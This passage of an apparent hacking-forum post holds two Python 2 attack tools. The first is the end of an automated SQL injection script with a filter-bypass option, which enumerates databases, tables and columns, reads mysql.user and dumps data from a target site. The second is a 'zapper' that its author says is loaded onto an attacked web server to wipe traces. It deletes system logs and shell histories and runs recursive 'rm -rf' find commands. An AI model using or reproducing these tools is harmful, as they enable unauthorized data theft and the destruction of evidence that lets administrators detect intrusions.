    if (re.findall("K0BRA(.*?)K0BRA",code1)):
     numbers = re.findall("K0BRA(.*?)K0BRA",code1)
     numbers = numbers[0]
     savefile("logs/"+gethost(web)+".txt","[DB] : "+db)
     savefile("logs/"+gethost(web)+".txt","[DB] : "+table)
     print "[+] information_schema : ON"
     print "[+] Columns Found : ",numbers,"\n"
     for counter in range(0,int(numbers)):
      code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
      if (re.findall("K0BRA(.*?)K0BRA",code2)):
       column = re.findall("K0BRA(.*?)K0BRA",code2)
       column = column[0]
       savefile("logs/"+gethost(web)+".txt","[Column Found] : "+column)
       print "[Column Found] : "+column

    else:
     print "[-] Not Found\n"


    def showtablesdb(web,db,passx):
    db = "0x"+str(binascii.hexlify(db))
    pass1,pass2 = bypass(passx)
    web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
    web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
    code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass2)
    print "\n\n[+] Searching tables in DB\n\n"
    savefile("logs/"+gethost(web)+".txt","[DB] : "+db)
    if (re.findall("K0BRA(.*?)K0BRA",code1)):
     numbers = re.findall("K0BRA(.*?)K0BRA",code1)
     numbers = numbers[0]
     print "[+] information_schema : ON"
     print "[+] Tables Found : ",numbers,"\n"
     for counter in range(0,int(numbers)):
      code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
     
      if (re.findall("K0BRA(.*?)K0BRA",code2)):
       table = re.findall("K0BRA(.*?)K0BRA",code2)
       table = table[0]
       print "[Table Found] : "+table
       savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table)
    else:
     print "[-] Not Found\n"



    def showtables(web,passx):
    pass1,pass2 = bypass(passx)
    web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))",web)
    web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
    code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
    print "\n\n[+] Searching tables\n\n"
    if (re.findall("K0BRA(.*?)K0BRA",code1)):
     numbers = re.findall("K0BRA(.*?)K0BRA",code1)
     numbers = numbers[0]
     print "[+] information_schema : ON"
     print "[+] Tables Found : ",numbers,"\n"
     for counter in range(17,int(numbers)):
      code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
      if (re.findall("K0BRA(.*?)K0BRA",code2)):
       table = re.findall("K0BRA(.*?)K0BRA",code2)
       table = table[0]
       print "[Table Found] : "+table
       savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table)
    else:
     print "[-] Not Found\n"



    def showcolumns(tabla,web,passx):
    pass1,pass2 = bypass(passx)
    tabla = "0x"+str(binascii.hexlify(tabla))
    web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))",web)
    web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
    code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass2)
    print "\n\n[+] Searching tables\n\n"
    savefile("logs/"+gethost(web)+".txt","[Table Found] : "+tabla)
    if (re.findall("K0BRA(.*?)K0BRA",code1)):
     numbers = re.findall("K0BRA(.*?)K0BRA",code1)
     numbers = numbers[0]
     print "[+] information_schema : ON"
     print "[+] Columns Found : ",numbers,"\n"
     for counter in range(0,int(numbers)):
      code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
      if (re.findall("K0BRA(.*?)K0BRA",code2)):
       column = re.findall("K0BRA(.*?)K0BRA",code2)
       column = column[0]
       print "[Column Found] : "+column
       savefile("logs/"+gethost(web)+".txt","[Column Found] : "+column)
    else:
     print "[-] Not Found\n"




    def showdbs(web,passx):
    pass1,pass2 = bypass(passx)
    web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
    web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))",web)
    code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2)
    print "\n\n[+] Searching DBS\n\n"
    if (re.findall("K0BRA(.*?)K0BRA",code1)):
     numbers = re.findall("K0BRA(.*?)K0BRA",code1)
     numbers = numbers[0]
     print "[+] information_schema : ON"
     print "[+] DBS Found : ",numbers,"\n"
     for counter in range(0,int(numbers)):
      code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
      if (re.findall("K0BRA(.*?)K0BRA",code2)):
       db = re.findall("K0BRA(.*?)K0BRA",code2)
       db = db[0]
       print "[DB Found] : "+db
       savefile("logs/"+gethost(web)+".txt","[DB Found] : "+db)
    else:
     print "[-] Not Found\n"




    def menu(page,bypass):
    clean()
    header()
    print "\n[+] Target : ",page,"\n"
    print "\n[information_schema]\n\n"
    print "1 - Show tables\n"
    print "2 - Show columns of the a table\n"
    print "3 - Show databases\n"
    print "4 - Show tables from the a DB\n"
    print "5 - Show columns from the a table of the DB\n"
    print "\n[mysql.user]\n\n"
    print "6 - Show users\n"
    print "\n[Others]\n\n"
    print "7 - Show details\n"
    print "8 - Dump data\n"
    print "9 - Show log\n"
    print "10 - Change target\n"
    print "11 - Exit\n\n"
    try:
     op = input("[Option] : ")
     if op == 1:
      showtables(page,bypass)
      raw_input()    
      menu(page,bypass)
     elif op == 2:
      table = raw_input("\n\n[Table] : ")
      showcolumns(table,page,bypass)
      raw_input()
      menu(page,bypass)
     elif op == 3:
      showdbs(page,bypass)
      raw_input()
      menu(page,bypass)
     elif op == 4:
      db = raw_input("\n\n[DB] : ")
      showtablesdb(page,db,bypass)
      raw_input()
      menu(page,bypass)
     elif op == 5:
      db = raw_input("\n\n[DB] : ")
      table = raw_input("\n\n[Table] : ")
      showcolumnsdb(page,db,table,bypass)
      raw_input()
      menu(page,bypass)
     elif op == 6:
      mysqluser(page,bypass)
      raw_input()
      menu(page,bypass)
     elif op == 7:
      more(page,bypass)
      raw_input()
      menu(page,bypass)
     elif op == 8:
      table = raw_input("\n\n[Table] : ")
      col1 = raw_input("\n\n[Column 1] : ")
      col2 = raw_input("\n\n[Column 2] : ")
      dumper(page,bypass,table,col1,col2)
      raw_input()
      menu(page,bypass)
     elif op == 9:
      os.system("start logs/"+gethost(page)+".txt")
      menu(page,bypass)
     elif op == 10:
      sta()
    except:
     menu(page,bypass)
    if op == 11:
     copyright()
     

    def more(web,passx):
    pass1,pass2 = bypass(passx)
    print "\n[+] Searching more data\n"
    web1 = re.sub("hackman","unhex(hex(concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)))",web)
    code0 = toma(web1+pass2)
    if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)):
     datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)
     datar = re.split("K0BRA",datax[0])
     print "[+] Username :",datar[1]
     print "[+] Database :",datar[2]
     print "[+] Version :",datar[3],"\n"
     savefile("logs/"+gethost(web)+".txt","[+] Username : "+datar[1])
     savefile("logs/"+gethost(web)+".txt","[+] Database : "+datar[2])
     savefile("logs/"+gethost(web)+".txt","[+] Version : "+datar[3]+"\n")
    code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
    if (re.findall("K0BRA",code1)):
      print "[+] mysql.user : on"
      savefile("logs/"+gethost(web)+".txt","[+] mysql.user : on")
    code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
    if (re.findall("K0BRA",code2)):
      print "[+] information_schema.tables : on"
      savefile("logs/"+gethost(web)+".txt","[+] information_schema.tables : on")

    def findlength(web,passx):
    pass1,pass2 = bypass(passx)
    print "\n[+] Finding columns length"
    number = "unhex(hex(concat(0x4b30425241,1,0x4b30425241)))"
    for te in range(2,30):
     number = str(number)+","+"unhex(hex(concat(0x4b30425241,"+str(te)+",0x4b30425241)))"
     code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+number+pass2)
     if (re.findall("K0BRA(.*?)K0BRA",code)):
      numbers = re.findall("K0BRA(.*?)K0BRA",code)
      print "[+] Column length :",te
      print "[+] Numbers",numbers,"print data"
      sql = ""
      tex = te + 1
      for sqlix in range(2,tex):
       sql = str(sql)+","+str(sqlix)
       sqli  = str(1)+sql
      sqla = re.sub(numbers[0],"hackman",sqli)
      savefile("logs/"+gethost(web)+".txt","[Target] : "+web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla)
      menu(web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla,passx)

    print "[-] Length dont found\n"
     
       
    def scan(web,passx):
    pass1,pass2 = bypass(passx)
    print "\n\n[+] Testing vulnerability"
    code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+"1"+pass2)
    if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
     print "[+] SQLI Detected"
     findlength(web,passx)
    else:
     print "[-] Not Vulnerable"
     copyright()


    def sta():

    clean()
    header()

    web = raw_input("\n\n[Page] : ")
    bypasx = raw_input("\n\n[Bypass] : ")
    scan(web,bypasx)

    sta()

    #The End

Scripting / [Python] Zapper By Doddy H
7 Octubre 2011, 01:39 AM
Hola a todos.

Acabo de hacer un simple zapper en python , tan solo lo cargan en el sistema web atacado y comienza
a borrar huellas.
Eso si , no me habia dado cuenta de que facil usar python xDD


#!usr/bin/python
#Zapper (C) Doddy Hackman

import os

paths = ["/var/log/lastlog", "/var/log/telnetd", "/var/run/utmp","/var/log/secure","/root/.ksh_history", "/root/.bash_history","/root/.bash_logut", "/var/log/wtmp", "/etc/wtmp","/var/run/utmp", "/etc/utmp", "/var/log", "/var/adm",
"/var/apache/log", "/var/apache/logs", "/usr/local/apache/logs","/usr/local/apache/logs", "/var/log/acct", "/var/log/xferlog",
"/var/log/messages/", "/var/log/proftpd/xferlog.legacy","/var/log/proftpd.xferlog", "/var/log/proftpd.access_log","/var/log/httpd/error_log", "/var/log/httpsd/ssl_log","/var/log/httpsd/ssl.access_log", "/etc/mail/access","/var/log/qmail", "/var/log/smtpd", "/var/log/samba",
"/var/log/samba.log.%m", "/var/lock/samba", "/root/.Xauthority","/var/log/poplog", "/var/log/news.all", "/var/log/spooler","/var/log/news", "/var/log/news/news", "/var/log/news/news.all",
"/var/log/news/news.crit", "/var/log/news/news.err", "/var/log/news/news.notice","/var/log/news/suck.err", "/var/log/news/suck.notice","/var/spool/tmp", "/var/spool/errors", "/var/spool/logs", "/var/spool/locks","/usr/local/www/logs/thttpd_log", "/var/log/thttpd_log","/var/log/ncftpd/misclog.txt", "/var/log/nctfpd.errs","/var/log/auth"]

comandos  = ['find / -name *.bash_history -exec rm -rf {} \;' , 'find / -name *.bash_logout -exec rm -rf {} \;','find / -name log* -exec rm -rf {} \;','find / -name  *.log -exec rm -rf {} \;','unset HISTFILE','unset SAVEHIST']

print "\n[+] Starting the zapper"

for path in paths :
try :
 os.delete(path)
except :
 pass

for cmd in comandos :
try:
 os.system(cmd)
except:
 pass

print "[+] All logs are erased\n"

#The End ?